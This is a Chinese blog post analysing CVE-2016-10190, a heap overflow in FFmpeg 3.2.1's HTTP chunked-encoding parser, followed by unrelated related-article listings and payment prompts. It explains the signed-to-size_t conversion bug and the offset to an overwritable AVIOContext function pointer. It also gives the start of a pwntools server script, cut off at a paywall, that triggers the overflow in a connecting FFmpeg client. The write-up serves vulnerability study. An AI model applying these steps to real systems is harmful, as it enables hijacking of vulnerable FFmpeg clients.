CVE-2016-10190 FFmpeg Heap Overflow 漏洞分析

最新推荐文章于 2023-05-11 14:24:11 发布
最新推荐文章于 2023-05-11 14:24:11 发布
阅读量1.4k 收藏 1
点赞数 1
分类专栏: 漏洞分析 堆溢出 文章标签: FFmpeg
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ch_fu/article/details/81463528
版权

0x01 漏洞分析

简单来说,是因为变量在传递过程中的类型不一致,导致了传入的负数被转化为极大数,最终导致了堆溢出漏洞。

在溢出的buffer的高地址处,刚好有可利用的对象,其中的函数指针可以被覆盖。如此,就可以在后续调用这个函数指针的时候成功劫持程序的控制流。

1.1 正常情况下的程序功能

ffmpeg的-i选项可以从指定的输入流获取视频,并保存为AVI格式。下面是一个正常使用的例子。

ffmpeg -i 示例.png

1.2 HTTP分块编码

HTTP Header中的Content-Length字段用于告诉Client,响应实体的长度。Content-Length必须和实体实际长度一致,通常如果Content-Length比实际长度短,会造成内容被截断;如果比实体内容长,会造成pending。

但是在获取网络文件等情景下,实体长度不是那么容易获得。为了不依靠Header中的长度信息,也能让Client知道实体的边界,Transfer-Encoding就是为了解决这个问题的。最新的HTTP规范只定义了一种传输编码:分块编码(chunked)。编码使用若干个Chunk组成,由一个标明长度为0的chunk结束,每个Chunk有两部分组成,第一部分是该Chunk的长度,第二部分就是指定长度的内容,每个部分用CRLF隔开。

使用分块编码的response如下所示:

HTTP/1.1 200 OK
Content-Type: text/plain
Transfer-Encoding: chunked

5\r\n
Hello\r\n
6\r\n
World!\r\n
0\r\n
\r\n

1.3 chunksize漂流记

漏洞就发生在ffmpeg处理HTTP分块编码response的过程中。

上一小节中说到,每个Chunk的第一部分是该Chunk的长度,代码中使用chunksize表示。然后看一下chunksize在程序运行中经历的传递和类型转换。

size类型转换

可以发现当传给recv函数时,chunksize最终被转换成了size_t类型。

顺便关注一下64位架构中的几种整数类型。

类型 位数 范围
long long 64 bit -2^63 ~ 2^63 -1
int64_t 64 bit -2^63 ~ 2^63 -1
int 32 bit -2^31 ~ 2^31 - 1
size_t 64 bit 0 ~ 2^64 -1

由于size_t是无符号整数,那么传入一个负数-1将会被转换为2^64 - 1,这将远大于buffrer的最大长度0x8000。此时如果传递长度大于0x8000的内容,将形成溢出。

0x02 利用思路

2.1 搭建环境

  1. 安装pwntools等工具

    $ sudo apt-get update
$ sudo apt-get upgrade -y
$ sudo apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev
build-essential
$ sudo pip install --upgrade pip
$ sudo pip install --upgrade pwntools
$ sudo pip install --upgrade ropper

  2. 使用下面的命令搭建环境:

    安装依赖:

    sudo apt-get update
sudo apt-get -y install autoconf automake build-essential libass-dev \
    libfreetype6-dev libsdl2-dev libtheora-dev libtool libva-dev libvdpau-dev \
    libvorbis-dev libxcb1-dev libxcb-shm0-dev libxcb-xfixes0-dev pkg-config \
    texinfo wget zlib1g-dev yasm

    编译安装FFmpeg 3.2.1

    $ wget https://github.com/FFmpeg/FFmpeg/archive/n3.2.1.tar.gz
$ tar xvfz n3.2.1.tar.gz
$ mkdir ~/ffmpeg_build
$ mkdir ~/ffmpeg_bin
$ cd FFmpeg-n3.2.1/
$ ./configure --prefix="$HOME/ffmpeg_build" --bindir="$HOME/ffmpeg_bin" \
  --disable-stripping
$ make -j4
$ sudo make install

2.2 检查程序保护

可以看到PIE(ASLR)是关闭的,这样的话在利用过程中就会简单很多。

gdb-peda$ checksec
CANARY    : ENABLED
FORTIFY   : ENABLED
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

2.3 劫持程序控制流

buffer刚好分配在一个AVIOContext对象的前面,并且AVIOContext对象中包含有函数指针readpacket。该对象的指针在avio_read函数中被使用,而avio_read函数将会在后续被调用——所以控制了read_packet就可以劫持程序控制流。

2.3.1 计算buffer和目标对象之间的距离

首先记录了AVIOContext对象的地址为0x1deebe0

AVIOContext地址

AVIOContext地址之readpacket

然后查看buff的地址为0x1de6b80

buf地址

相差了0x1deebe0 - 0x1de6b80 = 0x8060

2.3.2 验证填充

使用下面的代码引发crash,

#!/usr/bin/python

from pwn import *
import time
import socket

# HTTP Headers

headers = """HTTP/1.1 200 OK
Server: PwnServ/v1.0
Date: Sun, 11 Mar 1994 13:37:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked

"""

def main():
    # Start a listener and wait for a connection from ffmpeg

    while True:
        p = listen(12345)
        p.wait_for_connection()
        log.success("Victim found!")

        # Initialise the ffmpeg instance and prepare it for the bug
        p.send(headers)
        time.sleep(2)

        # Trigger the bug with the overly large read
        p.sendline("-1")
        log.info("Bug triggered. Please wait
最低0.47元/天 解锁文章
ch_fu
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2016-10190 FFmpeg Http协议 heap buffer overflow漏洞分析及利用
axiejundong的博客
12-30 951
1. 背景FFmpeg是一个著名的处理音视频的开源项目,非常多的播放器、转码器以及视频网站都用到了 FFmpeg 作为内核或者是处理流媒体的工具。2016年末 paulcher 发现FFmpeg三个堆溢出漏洞分别为CVE-2016-10190CVE-2016-10191以及CVE-2016-10192。本文对CVE-2016-10190进行了详细的分析,是一个学习如何利用堆溢出达到任意代码执行的一
CVE-2016-10191 FFmpeg RTMP Heap Buffer Overflow 漏洞分析及利用
weixin_34124939的博客
09-20 194
作者:栈长@蚂蚁金服巴斯光年安全实验室 一、前言 FFmpeg是一个著名的处理音视频的开源项目,使用者众多。2016年末paulcher发现FFmpeg三个堆溢出漏洞分别为CVE-2016-10190CVE-2016-10191以及CVE-2016-10192。网上对CVE-2016-10190已经有了很多分析文章,但是CVE-2016-10191尚未...
FFmpeg Heap Overflow 漏洞分析及利用
juruiyuan111的专栏
05-11 344
FFmpeg是一个著名的处理音视频的开源项目,使用者众多。2016年末paulcher发现FFmpeg三个堆溢出漏洞分别为CVE-2016-10190CVE-2016-10191以及CVE-2016-10192。本文详细分析CVE-2016-10190,是二进制安全入门学习堆溢出一个不错的案例。操作系统:Ubuntu 16.04 x64FFmpeg版本:3.2.1按照编译。
Sudo Buffer Overflow(CVE-2019-18634)
z4yn:)的博客
02-26 410
Sudo Buffer Overflow(CVE-2019-18634) A tutorial room exploring CVE-2019-18634 in the Unix Sudo Program. Room Two in the SudoVulns Series 0x01 简介 新发现的sudo漏洞CVE编号为CVE-2019-18634,影响sudo v1.8.26及更早版本,漏洞根源是一个栈溢出漏洞问题。 Vennix称该漏洞只有在sudoers配置文件的pwfeedback启用.
Stack and heap overflow detection at runtime via behavior analysis and Pin
symbloicexecute的博客
02-26 585
Stack and heap overflow detection at runtime via behavior analysis and Pin by Jonathan Salwan - 2013-10-14 Recently I looked for how it was possible to detect a classical stack overflow at run
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
CVE-2016-3720
02-22
这个项目是CVE-2016-3720 Demo,为了避免搭建环境,大佬们可以直接获取到这个资源。 相对应的分析文章是:https://blog.csdn.net/qq_36869808 可以在这篇文章看到分析的内容,感谢~当然如果非常需要这个资源,也...
解决OpenSSL "SSL-Death-Alert" 拒绝服务漏洞(CVE-2016-8610)安全漏洞,升级OpenSSL到OpenSSL 1.1.0k
10-25
最近放开了https服务,安全组扫描出新的漏洞,现对原OpenSSL 1.0.1g版本升级到OpenSSL 1.1.0k,同时重新编译OpenSSH及nginx,在此提供升级脚本,仅供参考
ffmpeg-frame-extractor:使用ffmpeg将输入视频文件转换为图像帧。 (需要在路径中安装ffmpeg
02-25
ffmpeg框架提取器
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
12-26
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
Heap overflow堆溢出(一)
「鸿渐之翼」的博客
10-01 3145
堆溢出介绍: 堆溢出是指程序向某个堆块中写入的字节数超过了堆块本身可使用的字节数(之所以是可使用而不是用户申请的字节数,是因为堆管理器会对用户所申请的字节数进行调整,这也导致可利用的字节数都不小于用户申请的字节数),因而导致了数据溢出,并覆盖到物理相邻的高地址......
php 5.6.15漏洞,CVE-2016-4071
weixin_33089345的博客
03-11 519
// PHP <= 7.0.4/5.5.33 SNMP format string exploit (32bit)// By Andrew Kramer // Should bypass ASLR/NX just fine// This exploit utilizes PHP's internal "%Z" (zval)// format specifier in order to ach...
tab点击切换,简单实例
LJ_QWE的博客
09-29 607
<template> <div class=" padding-50 tabchange" style="color:yellow;"> <ul class="title-ul clearfix"> <li class="title-lists active">tab1</li> <li class="title-lists ">tab2</li>
linux64 溢出,64位Linux下的栈溢出
weixin_36383252的博客
05-12 438
from:http://packetstormsecurity.com/files/download/127007/64bit-overflow.pdf本文的目的是让大家学到64位缓冲区溢出的基础知识。 作者Mr.Un1k0d3rRingZer0Team摘要0x01x86和x86_64的区别0x02漏洞代码片段0x03触发溢出0x04控制RIP0x05跳入用户控制的缓冲区0x06执...
php 漏洞 怎么解决,php安全漏洞怎么修复?
weixin_39869693的博客
03-09 3708
该楼层疑似违规已被系统折叠隐藏此楼查看此楼PHP PHAR扩展安全漏洞(CVE-2016-4072)PHP ‘php_filter_encode_url’函数整数溢出漏洞(CVE-2016-4345)PHP ‘str_pad’函数整数溢出漏洞(CVE-2016-4346)PHP‘wddx_stack_destroy’函数释放后重用漏洞(CVE-2016-7413)PHP Calendar...
linux内核3.10漏洞,【漏洞公告】CVE-2016-10229:Linux内核远程代码执行漏洞
weixin_42442958的博客
04-30 1058
Linux kernel 4.10.6Linux kernel 4.10.4Linux kernel 4.4.30Linux kernel 4.4.29Linux kernel 4.4.28Linux kernel 4.4.27Linux kernel 4.4.25Linux kernel 4.4.24Linux kernel 4.4.23Linux kernel 4.4.22Linux kern...
a different vulnerability than CVE-2016-4589, CVE-2016-4623, and CVE-2016-4624.是什么意思?
最新发布
07-25
"a different vulnerability than CVE-2016-4589, CVE-2016-4623, and CVE-2016-4624" 的意思是指一个与 CVE-2016-4589、CVE-2016-4623 和 CVE-2016-4624 不同的漏洞CVE(Common Vulnerabilities and Exposures)是一种公共漏洞和暴露标识符的命名方案,用于唯一标识计算机系统中的已知漏洞。每个CVE标识符都与特定的漏洞相关联。 在这句话中,提到了 CVE-2016-4589、CVE-2016-4623 和 CVE-2016-4624 这三个漏洞标识符。通过使用 "a different vulnerability" 这个短语,可以推断出在讨论的上下文中,还存在另一个与这三个漏洞不同的漏洞。 具体而言,这句话表达了在给定的情况下,存在多个漏洞,其中一个与 CVE-2016-4589、CVE-2016-4623 和 CVE-2016-4624 不同,可能需要进一步的信息或上下文来了解这个不同的漏洞是指什么。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值